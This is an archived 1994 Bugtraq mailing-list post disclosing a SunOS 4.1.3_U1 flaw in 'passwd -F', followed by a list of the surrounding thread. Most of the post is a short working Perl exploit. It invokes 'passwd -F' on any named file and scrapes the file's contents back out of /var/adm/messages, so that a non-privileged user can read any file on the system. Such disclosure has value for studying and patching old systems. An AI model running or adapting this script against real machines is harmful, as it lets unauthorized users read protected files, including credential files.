Bugtraq mailing list archives
passwd -F
From: steve () cati csufresno edu (Steve Mitchell)
Date: Tue, 10 May 94 17:19:53 PDT
FYI, this vulnerability exists on 4.1.3_U1. I do not know how
widespread knowledge of this vulnerability is, but I have seen Suns
running a modified passwd program that has "-F option disabled" (according
to the message output by passwd). So somebody out there has known about
it for a while.
The following trivial perl script allows non-privileged users to
easily read any file on the system.
--steve
--
Steve Mitchell KD6BET TIP#168 steve_mitchell () csufresno edu
"STUFF: Anything that can be used for homebrewing." "JUNK: Everything else
you thought could be used for homebrewing, but can't." --Steve Casselman
#!/usr/local/bin/perl
#
# Author disclaims all responsibility for misuse of this script
# --sjm 5/10/94
$file = shift || die "Usage: $0 filename\n";
open(A,"</var/adm/messages");
@statf = stat(A);
system("/usr/bin/passwd -F $file 1>&2 2>/dev/null");
seek(A,$statf[7],0);
while(<A>) {
next if !/passwd/;
($stuff,$line) = split(/"/,$_,2);
print $line;
}
Current thread:
- Re: new iss stuff, (continued)
- Re: new iss stuff Everett F Batey WA6CRE (May 10)
- Re: new iss stuff root () maths su oz au (May 10)
- Re: new iss stuff der Mouse (May 10)
- Re: new iss stuff Timothy Newsham (May 10)
- Re: new iss stuff jallen () nersc gov (May 10)
- Re: new iss stuff Pat Myrto (May 10)
- Re: new iss stuff Andrew Watts (May 10)
- Re: new iss stuff Pat Myrto (May 10)
- Re: new iss stuff Steven C. Blair (May 10)
- iss: _my_ last two cents der Mouse (May 11)
- Re: new iss stuff Pat Myrto (May 10)
- passwd -F Steve Mitchell (May 10)
- Re: passwd -F Pat Myrto (May 10)
- Re: passwd -F Daniel Azuelos (May 11)
- Re: passwd -F Casper Dik (May 11)